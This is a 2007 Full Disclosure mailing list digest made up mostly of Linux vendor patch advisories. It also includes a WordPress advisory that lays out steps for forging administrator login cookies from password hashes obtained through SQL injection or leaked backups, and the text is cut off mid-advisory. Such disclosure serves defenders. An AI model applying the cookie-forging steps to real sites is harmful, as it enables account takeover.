Full Disclosure mailing list archives
unsubscribe
From: "LT" <lt () mac hush com>
Date: Mon, 26 Nov 2007 18:54:01 +0100
On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure- request () lists grok org uk wrote:
Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability (security () mandriva com) 2. Wordpress Cookie Authentication Vulnerability (Steven J. Murdoch) 3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes) 4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs (security () mandriva com) 5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon)) 6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl (rPath Update Announcements) 7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar Broad) 8. [ MDKSA-2007:227 ] - Updated poppler packages fix vulnerabilities (security () mandriva com) 9. [ MDKSA-2007:228 ] - Updated cups packages fix vulnerabilities (security () mandriva com) 10. Tha Manual. (rchrafe) 11. The Call to Reason (rchrafe) 12. Re: How to become a Computer Security Professional ? (rchrafe) 13. Re: How to become a Computer Security Professional ? (rchrafe) 14. Re: How to become a Computer Security Professional ? (rchrafe) 15. Large Scale MySpace Phishing Attack (Dancho Danchev) 16. Re: Multiple stack-based buffer overflows in dxmsft.dll (Elazar Broad) 17. Re: so gay huh? (rchrafe) 18. Re: so gay huh? (rchrafe) -------------------------------------------------------------------
--- Message: 1 Date: Mon, 19 Nov 2007 11:12:22 -0700 From: security () mandriva com Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability To: full-disclosure () lists grok org uk Message-ID: <E1IuB6c-0001Xp-Fv () artemis annvix ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
__________________________________________________________________
_____ Mandriva Linux Security Advisory MDKSA- 2007:225 http://www.mandriva.com/security/
__________________________________________________________________
_____ Package : net-snmp Date : November 19, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
__________________________________________________________________
_____ Problem Description: The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a GETBULK request with a large max-repeaters value. Updated packages fix this issue.
__________________________________________________________________
_____ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
__________________________________________________________________
_____ Updated Packages: Mandriva Linux 2007.0: 83e0d0edc66af5d11b032cf2a7c12054 2007.0/i586/libnet-snmp10-5.3.1-
2.1mdv2007.0.i586.rpm 211db38ffbbefb22f653a18da8e928f5 2007.0/i586/libnet-snmp10-devel-
5.3.1-2.1mdv2007.0.i586.rpm b43cc33ca2b0fb582e69bbe52578e76a 2007.0/i586/libnet-snmp10- static-devel-5.3.1-2.1mdv2007.0.i586.rpm e2ac837cd1eff29bb56f5fa964f59ed5 2007.0/i586/net-snmp-5.3.1- 2.1mdv2007.0.i586.rpm 2434602e5d0a3133318600b4071cf4ea 2007.0/i586/net-snmp-mibs-5.3.1-
2.1mdv2007.0.i586.rpm d9336d2710c1a44531cdb790cd8f47cf 2007.0/i586/net-snmp-trapd- 5.3.1-2.1mdv2007.0.i586.rpm a1945889589568b420181a8a196d51ad 2007.0/i586/net-snmp-utils- 5.3.1-2.1mdv2007.0.i586.rpm cf8fd2357e80a805ab3210fd3a8f8d01 2007.0/i586/perl-NetSNMP-5.3.1- 2.1mdv2007.0.i586.rpm da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1- 2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7a4a25157d9a1e3b9cf4bf7af1205aa8 2007.0/x86_64/lib64net-snmp10- 5.3.1-2.1mdv2007.0.x86_64.rpm cab6a3e8bc7167656e38e5a429eb8c0a 2007.0/x86_64/lib64net-snmp10- devel-5.3.1-2.1mdv2007.0.x86_64.rpm 03f09f4fe99c381bda2603861f9644a2 2007.0/x86_64/lib64net-snmp10- static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm 425489fcb707757a46e0c6105309e2ff 2007.0/x86_64/net-snmp-5.3.1- 2.1mdv2007.0.x86_64.rpm 7df1fa9a564c63687621355561ba9eec 2007.0/x86_64/net-snmp-mibs- 5.3.1-2.1mdv2007.0.x86_64.rpm fe2aaae5507ae5122a7d30f9fd74eef5 2007.0/x86_64/net-snmp-trapd- 5.3.1-2.1mdv2007.0.x86_64.rpm ee1ae1d56af4b511b3bb2b1a986aa60a 2007.0/x86_64/net-snmp-utils- 5.3.1-2.1mdv2007.0.x86_64.rpm 04393ea88742f3b05586a555d8ad81ec 2007.0/x86_64/perl-NetSNMP- 5.3.1-2.1mdv2007.0.x86_64.rpm da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1- 2.1mdv2007.0.src.rpm Mandriva Linux 2007.1: fa0f200cd711f97684d9debfdeef3e15 2007.1/i586/libnet-snmp10-5.3.1-
3.1mdv2007.1.i586.rpm 68c25bedfd4370a5fc0aa5ff934a2b1b 2007.1/i586/libnet-snmp10-devel-
5.3.1-3.1mdv2007.1.i586.rpm ecbd2c76a1ea3595594f10c66bea5772 2007.1/i586/libnet-snmp10- static-devel-5.3.1-3.1mdv2007.1.i586.rpm 04c676ae1290bbfbd7083252ae5b10dd 2007.1/i586/net-snmp-5.3.1- 3.1mdv2007.1.i586.rpm 2a6c6befd5958c7c9c946d2189d2f128 2007.1/i586/net-snmp-mibs-5.3.1-
3.1mdv2007.1.i586.rpm 5cd1e27c1af30157ead213324c440527 2007.1/i586/net-snmp-trapd- 5.3.1-3.1mdv2007.1.i586.rpm 423682a7f455940da49272647925838e 2007.1/i586/net-snmp-utils- 5.3.1-3.1mdv2007.1.i586.rpm 1ca18897188b7a34d98b146d65746477 2007.1/i586/perl-NetSNMP-5.3.1- 3.1mdv2007.1.i586.rpm f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1- 3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 9cdea571a84945accd6d38527b1bedb5 2007.1/x86_64/lib64net-snmp10- 5.3.1-3.1mdv2007.1.x86_64.rpm 8352cb8ef1fac035ea009d696e1d5837 2007.1/x86_64/lib64net-snmp10- devel-5.3.1-3.1mdv2007.1.x86_64.rpm 5e54dd10e2f97bd2ee23f0a715ef734e 2007.1/x86_64/lib64net-snmp10- static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm 3187463725a5b015d3f507ac4a723160 2007.1/x86_64/net-snmp-5.3.1- 3.1mdv2007.1.x86_64.rpm 638d8c0a5d4be46ee1b9c2640ed7a061 2007.1/x86_64/net-snmp-mibs- 5.3.1-3.1mdv2007.1.x86_64.rpm c4f41ebf9bf64dfc5236bb935ee16c31 2007.1/x86_64/net-snmp-trapd- 5.3.1-3.1mdv2007.1.x86_64.rpm 734133a9a7a860f90b76c8bd72a0ddd0 2007.1/x86_64/net-snmp-utils- 5.3.1-3.1mdv2007.1.x86_64.rpm b1f5da81f1c27888df5ba8f71279fb05 2007.1/x86_64/perl-NetSNMP- 5.3.1-3.1mdv2007.1.x86_64.rpm f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1- 3.1mdv2007.1.src.rpm Corporate 3.0: 748009feee8a9d4d904b7e77537ff791 corporate/3.0/i586/libnet-snmp5-
5.1-7.3.C30mdk.i586.rpm 8ca0b75c8ec8e0839ae37335b04629ab corporate/3.0/i586/libnet-snmp5-
devel-5.1-7.3.C30mdk.i586.rpm a0c2d416faa87c016826b5f8616c3af3 corporate/3.0/i586/libnet-snmp5-
static-devel-5.1-7.3.C30mdk.i586.rpm 99659604d3f40d23179b2b3138178e41 corporate/3.0/i586/net-snmp-5.1-
7.3.C30mdk.i586.rpm 3f9e8c99d31dd0dd0d3e5364325370ac corporate/3.0/i586/net-snmp- mibs-5.1-7.3.C30mdk.i586.rpm 6bf842fa5664b91062fc74fac450aa90 corporate/3.0/i586/net-snmp- trapd-5.1-7.3.C30mdk.i586.rpm ced36508ad4a349cf945d62823b556d5 corporate/3.0/i586/net-snmp- utils-5.1-7.3.C30mdk.i586.rpm d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp- 5.1-7.3.C30mdk.src.rpm Corporate 3.0/X86_64: d3f097f7389841deb188d7353c5fdf5c corporate/3.0/x86_64/lib64net- snmp5-5.1-7.3.C30mdk.x86_64.rpm b53aea1a27f1c5a1e5515abb31ac70b0 corporate/3.0/x86_64/lib64net- snmp5-devel-5.1-7.3.C30mdk.x86_64.rpm a910dfbb95c2dd8fe70ce1c62e743c03 corporate/3.0/x86_64/lib64net- snmp5-static-devel-5.1-7.3.C30mdk.x86_64.rpm bfe1ba7a83f9afcacd9273eb6ebbd538 corporate/3.0/x86_64/net-snmp- 5.1-7.3.C30mdk.x86_64.rpm b6e7b70f0d7549f44850834b2542fb8f corporate/3.0/x86_64/net-snmp- mibs-5.1-7.3.C30mdk.x86_64.rpm a5ab3548c27e86789e41248ab53e4982 corporate/3.0/x86_64/net-snmp- trapd-5.1-7.3.C30mdk.x86_64.rpm 3c57bfdfa6b4ac44adab12bda0131a2f corporate/3.0/x86_64/net-snmp- utils-5.1-7.3.C30mdk.x86_64.rpm d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp- 5.1-7.3.C30mdk.src.rpm Corporate 4.0: 0fac46c024f1cb4a8be101e69a942233 corporate/4.0/i586/libnet-snmp5-
5.2.1.2-5.1.20060mlcs4.i586.rpm 857fcac472ce931834cccde0de2741e4 corporate/4.0/i586/libnet-snmp5-
devel-5.2.1.2-5.1.20060mlcs4.i586.rpm 112cceb5d76947959c251ecb1b157a3e corporate/4.0/i586/libnet-snmp5-
static-devel-5.2.1.2-5.1.20060mlcs4.i586.rpm ecf0b6386447f6442375cb39c60479cd corporate/4.0/i586/net-snmp- 5.2.1.2-5.1.20060mlcs4.i586.rpm 72a4fa1c8af3cc00bfbb3d877d5c329a corporate/4.0/i586/net-snmp- mibs-5.2.1.2-5.1.20060mlcs4.i586.rpm ab9ceaa6d9df42f687fe0c6790a2d266 corporate/4.0/i586/net-snmp- trapd-5.2.1.2-5.1.20060mlcs4.i586.rpm c66e13b576028690583f0fa2318bee3f corporate/4.0/i586/net-snmp- utils-5.2.1.2-5.1.20060mlcs4.i586.rpm 8aeab0a22ec99e5cde40593c883415aa corporate/4.0/i586/perl-NetSNMP-
5.2.1.2-5.1.20060mlcs4.i586.rpm b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp- 5.2.1.2-5.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 3bb05138c10885baa4db145f2ae6c726 corporate/4.0/x86_64/lib64net- snmp5-5.2.1.2-5.1.20060mlcs4.x86_64.rpm 2ef53cc96353eefb27abf76bc83bd35f corporate/4.0/x86_64/lib64net- snmp5-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm 14ce1bda23212a415cbdcc43b46813c2 corporate/4.0/x86_64/lib64net- snmp5-static-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm f6e393154ee66701b8fb5d848aeb3d7e corporate/4.0/x86_64/net-snmp- 5.2.1.2-5.1.20060mlcs4.x86_64.rpm 77fcaeda03c9bed289ba9a7a6cc1ca48 corporate/4.0/x86_64/net-snmp- mibs-5.2.1.2-5.1.20060mlcs4.x86_64.rpm e40ea44f385c0c92961fb11fa4013c02 corporate/4.0/x86_64/net-snmp- trapd-5.2.1.2-5.1.20060mlcs4.x86_64.rpm 537f8597086053c4d5a56ebd7d35b9e3 corporate/4.0/x86_64/net-snmp- utils-5.2.1.2-5.1.20060mlcs4.x86_64.rpm 51b4c70346529ba7a88de89543d16040 corporate/4.0/x86_64/perl- NetSNMP-5.2.1.2-5.1.20060mlcs4.x86_64.rpm b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp- 5.2.1.2-5.1.20060mlcs4.src.rpm Multi Network Firewall 2.0: 9210aef172a538942f490c89afb4022b mnf/2.0/i586/libnet-snmp5-5.1- 7.3.M20mdk.i586.rpm 844c7d5cb0cec99e3cab16792cb7766e mnf/2.0/SRPMS/net-snmp-5.1- 7.3.M20mdk.src.rpm
__________________________________________________________________
_____ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain
the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
__________________________________________________________________
_____ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM +tyjwf62Xh9rba65JnJ1RtU= =zmEd -----END PGP SIGNATURE----- ------------------------------ Message: 2 Date: Mon, 19 Nov 2007 18:46:37 +0000 From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch () cl cam ac uk> Subject: [Full-disclosure] Wordpress Cookie Authentication Vulnerability To: full-disclosure () lists grok org uk Message-ID: <20071119184637.GJ1043 () tern cl cam ac uk> Content-Type: text/plain; charset="us-ascii" Wordpress Cookie Authentication Vulnerability Original release date: 2007-11-19 Last revised: 2007-11-19 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie- auth.txt CVE ID: <pending> Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/> Systems Affected: Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11- 19) Overview: With read-only access to the Wordpress database, it is possible to generate a valid login cookie for any account, without resorting to a brute force attack. This allows a limited SQL injection vulnerability to be escalated into administrator access. This vulnerability is known to be actively exploited, hence the expedited public release. I. Description For authentication, the Wordpress user database stores the MD5 hash of login passwords. A client is permitted access if they can present a password whose hash matches the stored one. $ mysql -u wordpress -p wordpress Enter password: ******** mysql> SELECT ID, user_login, user_pass FROM wp_users; +----+-------------+----------------------------------+ | ID | user_login | user_pass | +----+-------------+----------------------------------+ | 1 | admin | 4cee2c84f6de6d89a4db4f2894d14e38 | ... Of course, entering your password after each action that requires authorization would be exceptionally tedious. So, after logging in, Wordpress presents the client with two cookies: wordpressuser_6092254072ca971c70b3ff302411aa5f=admin wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe
5de8f304a684 The cookie names contains the MD5 hash (6092...1a5f) of the blog URL. The value of wordpressuser_... is the login name, and the value of wordpresspass is the double-MD5 hash of the user password. Wordpress will permit access to a given user account if the wordpressuserpass_... cookie matches the hash of the specified user's wp_users.user_pass database entry. In other words, the database contains MD5(password) and the cookie contains MD5(MD5(password)). It is thus trivial to convert a database entry into an authentication cookie. At this point the vulnerability should be clear. If an attacker can gain read access to the wp_user table, for example due to a publicly visible backup or SQL injection vulnerability, a valid cookie can
be generated for any account. This applies even if the user's password is sufficiently complex to resist brute force and rainbow table attacks. While it should be computationally infeasible to go backwards from MD5(password) to password, the attacker needs only to go forwards. The exploitation steps are therefore: 1) Find the hash of the blog URL: Either just look at the URL, or create an account to get a user cookie 2) Read the user_pass entry from wp_users table: Look for backups, perform SQL injection, etc... 3) Set the following cookies: wordpressuser_<MD5(url)>=admin wordpresspass_<MD5(url)>=MD5(user_pass) 4) You have admin access to the blog II. Impact A remote attacker, with read access to the password database can gain administrator rights. This may be used in conjunction with an SQL injection attack, or after locating a database backup. An attacker who has alternatively compromised the database of one Wordpress blog can also gain access to any other whose users have
the same password on both. III. Solution No vendor patch is available. No timeline for a vendor patch has been announced. Workarounds: - Protect the Wordpress database, and do not allow backups to be released. - Keep your Wordpress installation up to date. This should reduce
the risk that your database will be compromised. - Do not share passwords across different sites. - If you suspect a database to be compromised, change all passwords to different ones. It is not adequate to change the passwords to the same ones, since Wordpress does not "salt" [1] the password database. - Remove write permissions on the Wordpress files for the system account that the webserver runs as. This will disable the theme editor, but make it more difficult to escalate Wordpress administrator access into the capability to execute arbitrary code - Configure the webserver to not execute files in any directory writable by the webserver system account (e.g. the upload directory). Potential fixes: The problem occurs because it is easy to go from the password hash in the database to a cookie (i.e the application of MD5 is the wrong way around). The simplest fix is to store MD5(MD5(password)) in the database, and make the cookie MD5(password). This still makes it infeasible to retrieve the password from a cookie, but means that it is also infeasible to generate a valid cookie from the database entry. However, there are other vulnerabilities in the Wordpress cookie
and password handling, which should be resolved too: - Passwords are unsalted [2], leaving them open to brute force, rainbow table and other attacks [3]. - It is impossible to revoke a cookie without changing the user's password. - Cookies do not contain an expiry time, so are always valid (until the user's password changes) - There ought to be an option to limit cookies to a particular IP address or range. References: [1] http://en.wikipedia.org/wiki/Salt_(cryptography) [2] http://trac.wordpress.org/ticket/2394 [3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a- password-cracker/ Timeline: 2007-10-29: security () wordpress org notified; no response 2007-11-02: security () wordpress org notified; Confirmation of active exploitation requested by Wordpress 2007-11-02: Confirmation sent; no response 2007-11-19: Advisory released to full-disclosure and BugTraq -- w: http://www.cl.cam.ac.uk/users/sjm217/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full- disclosure/attachments/20071119/f87361fa/attachment-0001.bin ------------------------------ Message: 3 Date: Mon, 19 Nov 2007 22:10:42 +0100 From: Pierre-Yves Rofes <py () gentoo org> Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer overflow To: gentoo-announce () gentoo org Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com, security-alerts () linuxsecurity com Message-ID: <4741FBD2.5040609 () gentoo org> Content-Type: text/plain; charset=ISO-8859-1 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - Gentoo Linux Security Advisory GLSA 200711-28 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - Severity: Normal Title: Perl: Buffer overflow Date: November 19, 2007 Bugs: #198196 ID: 200711-28 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - Synopsis ======== A buffer overflow in the Regular Expression engine in Perl possibly allows for the execution of arbitrary code. Background ========== Perl is a stable, cross-platform programming language created by Larry Wall. Affected packages ================= ---------------------------------------------------------------
---- Package / Vulnerable / Unaffected ---------------------------------------------------------------
---- 1 dev-lang/perl < 5.8.8-r4 >= 5.8.8-r4 Description =========== Tavis Ormandy and Will Drewry (Google Security Team) discovered a heap-based buffer overflow in the Regular Expression engine (regcomp.c) that occurs when switching from byte to Unicode (UTF-8) characters
in a regular expression. Impact ====== A remote attacker could either entice a user to compile a specially crafted regular expression or actively compile it in case the script accepts remote input of regular expressions, possibly leading to the execution of arbitrary code with the privileges of the user running Perl. Workaround ========== There is no known workaround at this time. Resolution ========== All Perl users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4" References ========== [ 1 ] CVE-2007-5116 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007- 5116 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-28.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security () gentoo org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg RVShInUYsQgHfjeb1K1xnE4= =wi9y -----END PGP SIGNATURE----- ------------------------------ Message: 4 Date: Mon, 19 Nov 2007 16:41:14 -0700 From: security () mandriva com Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs To: full-disclosure () lists grok org uk Message-ID: <E1IuGEs-0007rF-PH () artemis annvix ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
__________________________________________________________________
_____ Mandriva Linux Security Advisory MDKSA- 2007:226 http://www.mandriva.com/security/
__________________________________________________________________
_____ Package : kernel Date : November 19, 2007 Affected: 2008.0
__________________________________________________________________
_____ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: The minix filesystem code allows local users to cause a denial of service (hang) via a malformed minix file stream (CVE-2006-6058). An integer underflow in the Linux kernel prior to 2.6.23 allows remote attackers to cause a denial of service (crash) via a crafted SKB length value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA flag is set (CVE-2007-4997). To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate
__________________________________________________________________
_____ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
__________________________________________________________________
_____ Updated Packages: Mandriva Linux 2008.0: bfb8abfb7532255d239ce8ef3b39966b 2008.0/i586/kernel-2.6.22.9- 2mdv-1-1mdv2008.0.i586.rpm c68305809aa8704146ea1a59cd687ab1 2008.0/i586/kernel-desktop- 2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 89a439f86bd47820345287275fe25674 2008.0/i586/kernel-desktop- devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm a13eab853fc0b044456d90d98c8e9008 2008.0/i586/kernel-desktop- devel-latest-2.6.22.9-2mdv2008.0.i586.rpm 229f00634e286da1ab490678cf201dab 2008.0/i586/kernel-desktop- latest-2.6.22.9-2mdv2008.0.i586.rpm e77c3f728f0ba5bf8491e27ef389df8c 2008.0/i586/kernel-desktop586- 2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 82d8110dc838a1a25b2d4de0e94872e3 2008.0/i586/kernel-desktop586- devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 0be66b6c155ff5888900f784bf21f555 2008.0/i586/kernel-desktop586- devel-latest-2.6.22.9-2mdv2008.0.i586.rpm 48976bcfb3ecd30b2c2a671e49f2d241 2008.0/i586/kernel-desktop586- latest-2.6.22.9-2mdv2008.0.i586.rpm 372de082e77dec0e87d93f389bff76cf 2008.0/i586/kernel-doc-2.6.22.9-
2mdv2008.0.i586.rpm 8fb68460352343d0c14b3d2c5581375f 2008.0/i586/kernel-laptop- 2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 0c76031c7eb78ba7da93b83ebf531541 2008.0/i586/kernel-laptop-devel-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 059f66f5340e538dda3d748276313975 2008.0/i586/kernel-laptop-devel-
latest-2.6.22.9-2mdv2008.0.i586.rpm 4d6c700c736a476718c809fb3a470ed9 2008.0/i586/kernel-laptop- latest-2.6.22.9-2mdv2008.0.i586.rpm 57e0382893adc64445913de674815ad5 2008.0/i586/kernel-server- 2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm f2ea96b6c7f83f8de0f27dc1c2ea9193 2008.0/i586/kernel-server-devel-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 4de3613951fda9c4c92fcb35fe743a04 2008.0/i586/kernel-server-devel-
latest-2.6.22.9-2mdv2008.0.i586.rpm 4cc8313e4fed4a1a966bc4f4d0819f71 2008.0/i586/kernel-server- latest-2.6.22.9-2mdv2008.0.i586.rpm a30a7a388cdcdf089c39f7a7c26e34f0 2008.0/i586/kernel-source- 2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm 5b919908b67f94571a4851caf08e8ece 2008.0/i586/kernel-source- latest-2.6.22.9-2mdv2008.0.i586.rpm 6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9- 2mdv2007.0.src.rpm Mandriva Linux 2008.0/X86_64: d30b2a76ab4e37f296f07380fa8d41a4 2008.0/x86_64/kernel-2.6.22.9- 2mdv-1-1mdv2008.0.x86_64.rpm 3cdbd2356b7400f831a8b759d13952ec 2008.0/x86_64/kernel-desktop- 2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm a60abdec0274a9f96be2fb1117eb2f4a 2008.0/x86_64/kernel-desktop- devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm 272ac8a552c99a1b72303a92f474d46f 2008.0/x86_64/kernel-desktop- devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm 8c78406bc678b51a4c84526b0874703e 2008.0/x86_64/kernel-desktop- latest-2.6.22.9-2mdv2008.0.x86_64.rpm 8447a07d292dd930bba13a6d06bf6570 2008.0/x86_64/kernel-doc- 2.6.22.9-2mdv2008.0.x86_64.rpm 546663f7f08a1ed4a0e561c06960872e 2008.0/x86_64/kernel-laptop- 2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm 482b6130e1695693ebfd610aade49255 2008.0/x86_64/kernel-laptop- devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm 280678d50696a95f56735ad91fcc92ef 2008.0/x86_64/kernel-laptop- devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm f4fedb72b7d286f9b9dae772b8251a7a 2008.0/x86_64/kernel-laptop- latest-2.6.22.9-2mdv2008.0.x86_64.rpm c811160740d5c4e138430fb757803bcc 2008.0/x86_64/kernel-server- 2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm 1078b15d6cb4a1c420e7212d4a7ca545 2008.0/x86_64/kernel-server- devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm e127a24e39d458865ebc54e61a7db34b 2008.0/x86_64/kernel-server- devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm 347576ae981042a8277c2adcdb433cfc 2008.0/x86_64/kernel-server- latest-2.6.22.9-2mdv2008.0.x86_64.rpm 464e4b918285dac78af1b2521ebac461 2008.0/x86_64/kernel-source- 2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm affd96915a01aa3927dda61bd1fad19d 2008.0/x86_64/kernel-source- latest-2.6.22.9-2mdv2008.0.x86_64.rpm 6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9- 2mdv2007.0.src.rpm
__________________________________________________________________
_____ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain
the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
__________________________________________________________________
_____ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj 6pOfo1qywkIBnd5cQnlOdtM= =qX1m -----END PGP SIGNATURE----- ------------------------------ Message: 5 Date: Mon, 19 Nov 2007 21:14:15 -0000 From: "Rodrigo Rubira Branco (BSDaemon)" <rodrigo () kernelhacking com> Subject: [Full-disclosure] H2HC Materials To: full-disclosure () lists grok org uk Message-ID: <20071119231415.E4DED8BEEB () mail fjaunet com br> Content-Type: text/plain; charset="iso-8859-1"; For those who have interest in better know about H2HC conference, the presentation materials are now online at http://www.h2hc.org.br/repositorio.php cya, Rodrigo (BSDaemon). -- http://www.kernelhacking.com/rodrigo Kernel Hacking: If i really know, i can hack GPG KeyID: 1FCEDEA1 ________________________________________________ Message sent using UebiMiau 2.7.2 ------------------------------ Message: 6 Date: Mon, 19 Nov 2007 15:06:46 -0500 From: rPath Update Announcements <announce-noreply () rpath com> Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5- mysql php5-pear php5-pgsql php5-soap php5-xsl To: security-announce () lists rpath com, update-announce () lists rpath com, product-announce () lists rpath com Cc: lwn () lwn net, full-disclosure () lists grok org uk, vulnwatch () vulnwatch org, bugtraq () securityfocus com Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply () rpath com> Content-Type: text/plain; charset=us-ascii rPath Security Advisory: 2007-0242-1 Published: 2007-11-19 Products: rPath Appliance Platform Linux Service 1 rPath Linux 1 Rating: Minor Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: php5=conary.rpath.com@rpl:1/5.2.5-1-1 php5-cgi=conary.rpath.com@rpl:1/5.2.5-1-1 php5-mysql=conary.rpath.com@rpl:1/5.2.5-1-1 php5-pear=conary.rpath.com@rpl:1/5.2.5-1-1 php5-pgsql=conary.rpath.com@rpl:1/5.2.5-1-1 